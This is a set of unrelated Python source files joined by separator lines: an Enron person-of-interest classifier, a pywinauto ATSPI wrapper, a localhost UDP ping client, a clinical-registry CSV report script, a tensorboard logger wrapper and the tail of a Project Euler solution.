    # of five or more cubes that are digit permutations of one another.
    repr_cnt = [cube_repr.count(x) >= 5 for x in cube_repr]
    if any(repr_cnt):
        # Print the family of permuted cubes and stop.
        print([x[0] for x in zip(cubes, repr_cnt) if x[1]])
        break
    digits += 1
|
#!/usr/bin/python
import sys
import pickle
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
sys.path.append("../tools/")
from feature_format import featureFormat, targetFeatureSplit
from tester import dump_classifier_and_data,test_classifier
from sklearn.pipeline import Pipeline,FeatureUnion
from sklearn.feature_selection import SelectKBest
from sklearn.model_selection import GridSearchCV
from sklearn.ensemble import IsolationForest,RandomForestClassifier,AdaBoostClassifier
from sklearn.preprocessing import StandardScaler,MinMaxScaler
from sklearn.neighbors import LocalOutlierFactor,NearestNeighbors,KNeighborsClassifier
from sklearn.metrics import recall_score,precision_score,accuracy_score,f1_score
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.cross_validation import train_test_split
from sklearn.decomposition import PCA
### Task 1: Select what features you'll use.
### features_list is a list of strings, each of which is a feature name.
### The first feature must be "poi".
# Financial and email features fed to the classifiers; 'poi' must stay first
# because it is the prediction target (see targetFeatureSplit below).
features_list = ['poi', 'salary', 'bonus', 'long_term_incentive', 'deferred_income',
                 'loan_advances', 'other', 'expenses','director_fees',
                 'exercised_stock_options', 'restricted_stock',
                 'total_stock_value', 'to_messages', 'from_messages', 'from_this_person_to_poi',
                 'from_poi_to_this_person', 'shared_receipt_with_poi'] # You will need to use more features
### Load the dictionary containing the dataset
# NOTE(review): text-mode "r" with pickle implies Python 2; Python 3 needs "rb".
with open("final_project_dataset.pkl", "r") as data_file:
    data_dict = pickle.load(data_file)
pd.set_option('display.max_columns', None)
##convert to pandas dataframe
df=pd.DataFrame.from_dict(data_dict,orient='index')
# The source data encodes missing values as the string 'NaN'.
df.replace('NaN',0.0,inplace= True)
### Task 3: Create new feature(s)
# Ratio features: POI email-traffic shares and bonus proportions.
df['fraction_from_poi'] = df['from_poi_to_this_person'] / df['to_messages']
df['fraction_to_poi'] = df['from_this_person_to_poi'] / df['from_messages']
df['fraction_bonus']= df['bonus'] / df['total_payments']
df['bonus_to_salary'] = df['bonus']/df['salary']
# Back to dict form; NaNs from zero-division become 'NaN' strings again.
data_dict = df.fillna(value='NaN').to_dict(orient='index')
### Task 2: Remove outliers
def deloutliers(dictionary, data, contamination=0.02):
    """Remove records flagged as outliers by LocalOutlierFactor.

    dictionary    -- the {name: features} dataset dict (mutated in place)
    data          -- numpy array from featureFormat(..., sort_keys=True)
    contamination -- expected fraction of outliers (default 0.02)

    Returns the same dictionary with flagged records deleted.
    """
    out = LocalOutlierFactor(contamination=contamination)
    labels, features = targetFeatureSplit(data)
    # FIX: `data` was built with sort_keys=True, so the i-th prediction
    # corresponds to the i-th *sorted* key.  Zipping against the dict's
    # arbitrary iteration order deleted the wrong records.
    # NOTE(review): featureFormat can also drop all-zero records, which
    # would still shift this alignment -- verify the lengths match.
    flagged = [key for key, pred in zip(sorted(dictionary.keys()),
                                        out.fit_predict(features, labels))
               if pred == -1]
    # Collect first, then delete: never mutate a dict while iterating it.
    for key in flagged:
        del dictionary[key]
    return dictionary
### Task 2 (continued): drop known bad records before outlier detection.
# FIX: give every pop() a default (consistent with the 'TOTAL' pop) so the
# script does not crash with KeyError if a record is already absent.
data_dict.pop('TOTAL', 0)                           # spreadsheet aggregation row, not a person
data_dict.pop('THE TRAVEL AGENCY IN THE PARK', 0)   # not a person
data_dict.pop('LOCKHART EUGENE E', 0)               # this key does not contain any value to its feature
data_dict = deloutliers(data_dict, featureFormat(data_dict, features_list, sort_keys=True))
### Store to my_dataset for easy export below.
my_dataset = data_dict
### Extract features and labels from dataset for local testing
data = featureFormat(data_dict, features_list, sort_keys=True)
labels, features = targetFeatureSplit(data)
##clf=AdaBoostClassifier()
##clf.fit(features_train,labels_train)
##tree_feature_importances = (clf.feature_importances_)
##tree_features = zip(tree_feature_importances, features_list[1:])
##tree_features = sorted(tree_features, key= lambda x:x[0], reverse=True)
##
### Display the feature names and importance values
##print('Tree Feature Importances:\n')
##for i in range(10):
## print('{} : {:.4f}'.format(tree_features[i][1], tree_features[i][0]))
### Task 4: Try a varity of classifiers
### Please name your classifier clf for easy export below.
### Note that if you want to do PCA or other multi-stage operations,
### you'll need to use Pipelines. For more info:
### http://scikit-learn.org/stable/modules/pipeline.html
# Provided to give you a starting point. Try a variety of classifiers.
#feature selection using PCA
'''
data = featureFormat(my_dataset, features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
pca_svm = Pipeline([('kbest',SelectKBest()),('scaler',StandardScaler()),('svm',SVC())])
param_grid = ([{'kbest__k': [3,4,5,6],
'svm__C': [1000,10000],
'svm__gamma': [0.01,0.0001],
'svm__degree':[2,3],
'svm__kernel': ['linear','rbf','poly']}])
svm_clf = GridSearchCV(pca_svm,param_grid,scoring='recall').fit(features,labels).best_estimator_
pca_knb = Pipeline([('pca',PCA(n_components=2)),('scaler',StandardScaler()),('knb',KNeighborsClassifier())])
param_grid = ([{'knb__n_neighbors': [4,5,6]}])
knb_clf = GridSearchCV(pca_knb,param_grid,scoring='recall').fit(features,labels).best_estimator_
pca_rfst = Pipeline([('pca',PCA(n_components=2)),('scaler',StandardScaler()),
('rfst',RandomForestClassifier())])
param_grid = ([{'rfst__n_estimators': [4,5,6]}])
rfst_clf = GridSearchCV(pca_rfst,param_grid,scoring='recall').fit(features,labels).best_estimator_
pca_tree = Pipeline([('pca',PCA(n_components=2)),('scaler',StandardScaler()),('tree',DecisionTreeClassifier())])
param_grid = ([{'tree__criterion':['gini','entropy'],
'tree__min_samples_split' :[2,4,6,8,10,20],
'tree__max_features' : [None,'sqrt','log2','auto']}])
tree_clf = GridSearchCV(pca_tree,param_grid,scoring='recall').fit(features,labels).best_estimator_
print svm_clf
test_classifier(svm_clf,my_dataset,features_list)
print knb_clf
test_classifier(knb_clf,my_dataset,features_list)
print rfst_clf
test_classifier(rfst_clf,my_dataset,features_list)
print tree_clf
test_classifier(tree_clf,my_dataset,features_list)'''
#feature selection using SelectKBest
'''eng_svm = Pipeline([('scaler',StandardScaler()),('kbest',SelectKBest()),('svm',SVC())])
param_grid = ([{'kbest__k':[3,4,5,6],
'svm__C': [1,10,100,1000],
'svm__gamma': [1,0.1,0.01,0.001],
'svm__degree':[2,3,4],
'svm__kernel': ['linear','rbf','poly']}])
svm_clf = GridSearchCV(eng_svm,param_grid,scoring='recall').fit(features,labels).best_estimator_
eng_knb = Pipeline([('scaler',StandardScaler()),('kbest',SelectKBest()),('knb',KNeighborsClassifier())])
param_grid = ([{'kbest__k':[3,4,5,6],'knb__n_neighbors': [2,3,4,5,6]}])
knb_clf = GridSearchCV(eng_knb,param_grid,scoring='recall').fit(features,labels).best_estimator_
eng_rfst = Pipeline([('scaler',StandardScaler()),('kbest',SelectKBest()),
('rfst',RandomForestClassifier())])
param_grid = ([{'kbest__k':[3,4,5,6],'rfst__n_estimators': [2,3,4,5,6]}])
rfst_clf = GridSearchCV(eng_rfst,param_grid,scoring='recall').fit(features,labels).best_estimator_
eng_tree = Pipeline([('kbest',SelectKBest()),('scaler',StandardScaler()),('tree',DecisionTreeClassifier())])
param_grid = ([{'kbest__k':[3,4,5,6],
'tree__criterion':['gini','entropy'],
'tree__min_samples_split' :[2,4,6,8,10,20],
'tree__max_features' : [None,'sqrt','log2','auto']}])
tree_clf = GridSearchCV(eng_tree,param_grid,scoring='recall').fit(features,labels).best_estimator_
print svm_clf
test_classifier(svm_clf,my_dataset,features_list)
print knb_clf
test_classifier(knb_clf,my_dataset,features_list)
print rfst_clf
test_classifier(rfst_clf,my_dataset,features_list)
print tree_clf
test_classifier(tree_clf,my_dataset,features_list)
'''
#Hybrid feature selection using feature union that combines PCA and SelectKBest
# FeatureUnion concatenates PCA components with the top-k original features;
# each pipeline then scales and fits a different classifier, tuned via
# GridSearchCV on recall (POIs are the rare positive class, so recall is
# the chosen selection criterion).
combined_features = FeatureUnion([("pca", PCA()), ("kbest", SelectKBest())])
hybrid_svm = Pipeline([('features',combined_features),('scaler',StandardScaler()),('svm',SVC())])
param_grid = ([{'features__pca__n_components':[2,3,4,5,6,7],'features__kbest__k':[2,3,4,5,6,7],
               'svm__C': [1,10,100,1000],
                'svm__gamma': [1,0.1,0.01,0.001],
                'svm__degree':[2,3,4],
                'svm__kernel': ['rbf','poly']}])
svm_clf = GridSearchCV(hybrid_svm,param_grid,scoring='recall').fit(features,labels).best_estimator_
hybrid_knb = Pipeline([('features',combined_features),('scaler',StandardScaler()),('knb',KNeighborsClassifier())])
param_grid = ([{'features__pca__n_components':[2,3,4,5,6],'features__kbest__k':[2,3,4,5,6],'knb__n_neighbors': [1,2,3,4,5,6,7]}])
knb_clf = GridSearchCV(hybrid_knb,param_grid,scoring='recall').fit(features,labels).best_estimator_
# NOTE(review): all three pipelines share the same combined_features
# instance; presumably safe because GridSearchCV clones estimators --
# confirm against the scikit-learn version in use.
hybrid_rfst = Pipeline([('features',combined_features),('scaler',StandardScaler()),
                        ('rfst',RandomForestClassifier())])
param_grid = ([{'features__pca__n_components':[2,3,4,5,6],'features__kbest__k':[2,3,4,5,6],'rfst__n_estimators': [2,3,4,5,6,7]}])
rfst_clf = GridSearchCV(hybrid_rfst,param_grid,scoring='recall').fit(features,labels).best_estimator_
# Report each tuned estimator with the project's stratified-shuffle tester
# (Python 2 print statements).
print svm_clf
test_classifier(svm_clf,my_dataset,features_list)
print knb_clf
test_classifier(knb_clf,my_dataset,features_list)
print rfst_clf
test_classifier(rfst_clf,my_dataset,features_list)
### Task 5: Tune your classifier to achieve better than .3 precision and recall
### using our testing script. Check the tester.py script in the final project
### folder for details on the evaluation method, especially the test_classifier
### function. Because of the small size of the dataset, the script uses
### stratified shuffle split cross validation. For more info:
### http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.StratifiedShuffleSplit.html
# Example starting point. Try investigating other evaluation techniques!
features_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.3, random_state=42)
### Task 6: Dump your classifier, dataset, and features_list so anyone can
### check your results. You do not need to change anything below, but make sure
### that the version of poi_id.py that you submit can be run on its own and
### generates the necessary .pkl files for validating your results.
# FIX: `clf` was never defined, so the dump below raised a NameError.
# Export one of the tuned estimators from Task 4; swap in svm_clf or
# rfst_clf here to submit a different model.
clf = knb_clf
dump_classifier_and_data(clf, my_dataset, features_list)
|
# GUI Application automation and testing library
# Copyright (C) 2006-2017 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Basic wrapping of Linux ATSPI elements"""
from __future__ import unicode_literals
from __future__ import print_function
import six
from .. import backend
from ..base_wrapper import BaseWrapper
from ..base_wrapper import BaseMeta
from ..linux.atspi_element_info import AtspiElementInfo
from Xlib import Xatom
from Xlib.display import Display
# region PATTERNS
# ====================================================================
class InvalidWindowHandle(RuntimeError):
    """Raised when an invalid handle is passed to AtspiWrapper"""

    def __init__(self, hwnd):
        """Initialise the RuntimeError parent with the message"""
        # FIX: corrected "vaild" -> "valid" in the user-facing message.
        RuntimeError.__init__(self,
            "Handle {0} is not a valid window handle".format(hwnd))
# =========================================================================
class AtspiMeta(BaseMeta):
    """Metaclass that maps ATSPI control types to their wrapper classes"""

    # Shared registry: control-type name -> wrapper class.
    control_type_to_cls = {}

    def __init__(cls, name, bases, attrs):
        """Record every control type the new class declares"""
        BaseMeta.__init__(cls, name, bases, attrs)
        registry = AtspiMeta.control_type_to_cls
        for control_type in cls._control_types:
            registry[control_type] = cls

    @staticmethod
    def find_wrapper(element):
        """Return the registered wrapper for this Atspi element.

        Falls back to the generic AtspiWrapper when the element's control
        type has no specific wrapper registered.
        """
        return AtspiMeta.control_type_to_cls.get(element.control_type, AtspiWrapper)
# =========================================================================
@six.add_metaclass(AtspiMeta)
class AtspiWrapper(BaseWrapper):
    """
    Default wrapper for User Interface Automation (Atspi) controls.
    All other Atspi wrappers are derived from this.
    This class wraps a lot of functionality of underlying Atspi features
    for working with windows.
    Most of the methods apply to every single element type. For example
    you can click() on any element.
    """
    # Empty on purpose: AtspiMeta.find_wrapper falls back to this class
    # when an element's control type has no specific wrapper registered.
    _control_types = []
    # ------------------------------------------------------------
    def __new__(cls, element_info):
        """Construct the control wrapper"""
        return super(AtspiWrapper, cls)._create_wrapper(cls, element_info, AtspiWrapper)
    # -----------------------------------------------------------
    def __init__(self, element_info):
        """
        Initialize the control

        * **element_info** is either a valid AtspiElementInfo or it can be an
          instance or subclass of AtspiWrapper.

        If the handle is not valid then an InvalidWindowHandle error
        is raised.
        """
        BaseWrapper.__init__(self, element_info, backend.registry.backends['atspi'])
    # ------------------------------------------------------------
    def set_keyboard_focus(self):
        """Set the focus to this element"""
        self.element_info.component.grab_focus("screen")
        return self
    # ------------------------------------------------------------
    def set_window_focus(self, pid):
        """Raise (via python-xlib) X11 windows belonging to process *pid*.

        Fallback used by set_focus() when grabbing focus through ATSPI does
        not make the window visible.
        """
        display = Display()
        root = display.screen().root
        def top_level_set_focus_by_pid(pid, window, indent):
            # Depth-first walk over the X window tree.
            children = window.query_tree().children
            for w in children:
                # NOTE(review): both checks below inspect `window` (the
                # parent) while the recursion descends into each child `w`
                # -- confirm whether the WM_CLASS/PID test was meant to
                # apply to `w` instead.
                if window.get_wm_class() is not None:
                    if window.get_full_property(display.get_atom("_NET_WM_PID"), Xatom.CARDINAL).value[0] == pid:
                        window.raise_window()
                top_level_set_focus_by_pid(pid, w, indent + '-')
        top_level_set_focus_by_pid(pid, root, '-')
    # ------------------------------------------------------------
    def set_focus(self):
        """Try to focus this element's window, with an XLIB fallback"""
        # NOTE(review): `and` binds tighter than `or`, so this condition is
        # parent == root  OR  (grandparent == root AND not visible);
        # confirm that grouping is intended.
        if self.parent() == self.root() or self.parent().parent() == self.root() and not self.is_visible():
            # Try to find first child control of current window like button or text area and set focus to it.
            # It should automatically set focus to window.
            for child in self.descendants():
                # TODO extend list of focusable elements
                if child.element_info.control_type in ['PushButton', 'CheckBox', 'ToggleButton', 'RadioButton',
                                                       'Text']:
                    child.set_keyboard_focus()
                    break
            if not self.is_visible():
                # If unable to set window focus via ATSPI try to set focus via XLIB
                self.set_window_focus(self.element_info.process_id)
        else:
            self.set_keyboard_focus()
        return self
    # ------------------------------------------------------------
    def get_states(self):
        """Return the ATSPI state set reported for this element"""
        return self.element_info.get_state_set()
    # ------------------------------------------------------------
    def get_menu(self):
        """Return the last MenuBar descendant, or None if there is none"""
        self.verify_actionable()
        menu = None
        # The loop keeps overwriting, so the *last* MenuBar found wins.
        for child in self.descendants():
            if child.element_info.control_type in ["MenuBar"]:
                menu = child
        return menu
    # -----------------------------------------------------------
    def is_active(self):
        """Whether the element is active or not"""
        # NOTE(review): relies on a `state` attribute (presumably provided
        # by BaseWrapper / element_info) yielding ATSPI state names.
        for i in self.state:
            if i == 'STATE_ACTIVE':
                return True
        return False
    # -----------------------------------------------------------
    def get_slider(self):
        """Return the first ScrollBar descendant.

        NOTE(review): raises IndexError when no ScrollBar descendant exists
        -- confirm callers guarantee one is present.
        """
        self.verify_actionable()
        slider = []
        for child in self.descendants():
            if child.element_info.control_type in ["ScrollBar"]:
                slider.append(child)
        return slider[0]
# Register and activate the ATSPI backend so pywinauto resolves elements
# through AtspiElementInfo/AtspiWrapper by default on this platform.
backend.register('atspi', AtspiElementInfo, AtspiWrapper)
backend.activate('atspi')  # default for Linux
|
import socket
import time

# Target echo server and the payload prefix for every ping.
UDP_IP = 'localhost'
UDP_PORT = 12000
MESSAGE = "PING"

# UDP client socket; recvfrom() below blocks for at most one second.
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
clientSocket.settimeout(1)

# Send ten sequence-numbered pings and report each round-trip time.
for seq in range(1, 11):
    payload = (MESSAGE + ' ' + str(seq)).encode('utf8')
    # Timestamp taken just before the send so RTT covers the full round trip.
    initialTime = time.time()
    clientSocket.sendto(payload, (UDP_IP, UDP_PORT))
    try:
        # Echo replies are tiny, so a 10-byte buffer is sufficient.
        (data, address) = clientSocket.recvfrom(10)
        RTT = time.time() - initialTime
        print (str(RTT) + ' ' + data.decode('utf8'))
    except socket.timeout:
        # No reply within one second: treat this request as lost.
        print ('Request Timeout')
|
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import pytest
import params
from optparse import OptionParser
# Module-level load (runs at import time): keep only registry rows for
# visits that were actually performed (SVPERF == 'Y') and that are not the
# baseline visit (VISCODE != 'bl').  These frames feed draw_pie() below.
df_ec = pd.read_csv("t2_ec 20190619.csv")
df_registry = pd.read_csv("t2_registry 20190619.csv")
df_registry = df_registry[ df_registry.SVPERF == 'Y' ]
df_registry = df_registry[ df_registry.VISCODE != 'bl' ]
def draw_pie(df_ec, df_registry):
    """Display a pie chart of registry VISCODE values in the browser.

    NOTE(review): df_ec is accepted but never used here; only the registry
    frame feeds the chart.  No `values` argument is supplied to go.Pie --
    confirm slice sizes are derived as intended.
    """
    fig = go.Figure(go.Pie(
        name = "",
        labels = df_registry.VISCODE,
        hovertemplate = "Viscode: <B>%{label}</B><br><B>Count: %{value} (%{percent}) </B>",
        title = dict(text="Viscodes from Registry", font=dict(size=20), position="top left")
    ))
    fig.show()
    return
# Read CSV files
def csv_report():
    """Load the EC and registry CSV exports and return them as two frames."""
    ec_frame = pd.read_csv("t2_ec 20190619.csv")
    registry_frame = pd.read_csv("t2_registry 20190619.csv")
    return ec_frame, registry_frame
# Merge dataframes on RID and VISCODE
def merge_dataframes(df_ec, df_registry, rid='RID', viscode='VISCODE'):
    """Outer-merge the registry frame with the EC frame on the key columns.

    df_ec       -- EC dataframe (right side of the merge)
    df_registry -- registry dataframe (left side of the merge)
    rid         -- name of the subject-id key column (default 'RID')
    viscode     -- name of the visit-code key column (default 'VISCODE')

    Returns the merged frame including pandas' `_merge` indicator column.
    """
    # FIX: the rid/viscode parameters were accepted but ignored (keys were
    # hard-coded).  Honour them; the defaults preserve the old behaviour.
    df_merge = pd.merge(df_registry, df_ec, on=[rid, viscode], how='outer', indicator=True)
    return df_merge
# Filter records
def filter_records(df, viscode, svdose, ecsdstxt):
    """Select rows with the given visit code and dose flag whose ECSDSTXT
    differs from *ecsdstxt*; print and return the filtered frame."""
    matches_visit = df[df.VISCODE == viscode]
    matches_dose = matches_visit[matches_visit.SVDOSE == svdose]
    df_filtered = matches_dose[matches_dose.ECSDSTXT != ecsdstxt]
    print(df_filtered)
    return df_filtered
# Create CSV file
def create_csv_file(df, options):
    """Write the key EC/registry columns of *df* to options.results
    (no index, no header), echoing the frame to stdout."""
    key_columns = ['ID_x', 'RID', 'USERID_x', 'VISCODE', 'SVDOSE', 'ECSDSTXT']
    df_csv = df[key_columns]
    print(df_csv)
    # to_csv returns None when given a path, so the second print emits
    # "None"; kept to reproduce the original behaviour exactly.
    csv = df_csv.to_csv(options.results, index=False, header=False)
    print(csv)
if __name__ == "__main__":
    # Command-line knobs; the defaults reproduce the original analysis run.
    parser = OptionParser()
    parser.add_option('', '--viscode', dest='viscode', default='w02', help='Viscode parameter')
    parser.add_option('', '--rid', dest='rid', default='RID', help='Rid parameter')
    parser.add_option('', '--svdose', dest='svdose', default='Y', help='Svdose parameter')
    parser.add_option('', '--ecsdstxt', dest='ecsdstxt', default='180', help='Ecsdstxt parameter')
    parser.add_option('', '--results', dest='results', default='results.csv', help='results directory parameter')
    options = parser.parse_args()[0]
    # NOTE(review): draw_pie uses the module-level frames loaded at import
    # time, not anything from `options`.
    draw_pie(df_ec, df_registry)
    # Merge, filter, and export the records selected by the CLI options.
    df_merge = merge_dataframes(df_ec, df_registry, options.rid, options.viscode)
    df_filtered = filter_records(df_merge, options.viscode, options.svdose, options.ecsdstxt)
    create_csv_file(df_filtered, options)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-01-25 17:16:34
# @Author : Raymond Wong (jiabo.huang@qmul.ac.uk)
# @Link : github.com/Raymond-sci
from tensorboardX import SummaryWriter as TFBWriter
from ..config import CONFIG as cfg
class TFLogger():
    """Thin wrapper around tensorboardX's SummaryWriter.

    Becomes a transparent no-op when running in debug mode or when the
    --log-tfb flag is not set, so call sites never need to check.
    """

    @staticmethod
    def require_args():
        """Declare the --log-tfb command-line flag on the shared config."""
        cfg.add_argument('--log-tfb', action='store_true',
                        help='use tensorboard to log training process. '
                             '(default: False)')

    def __init__(self, debugging, *args, **kwargs):
        """Create a real SummaryWriter only when logging is wanted."""
        self.debugging = debugging
        if not self.debugging and cfg.log_tfb:
            self.writer = TFBWriter(*args, **kwargs)

    def __getattr__(self, attr):
        """Delegate unknown attributes to the writer, or swallow them.

        Only invoked for attributes not found through normal lookup, so
        `debugging` and (when present) `writer` never route through here.
        """
        if self.debugging or not cfg.log_tfb:
            return do_nothing
        return getattr(self.writer, attr)
def do_nothing(*args, **kwargs):
    """Accept any arguments and return None; stand-in for writer methods
    when tensorboard logging is disabled."""
    return None
# Make TFLogger discoverable under the 'tf_logger' key of this package's
# class registry.
from ..register import REGISTER
REGISTER.set_class(REGISTER.get_package_name(__name__), 'tf_logger', TFLogger)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.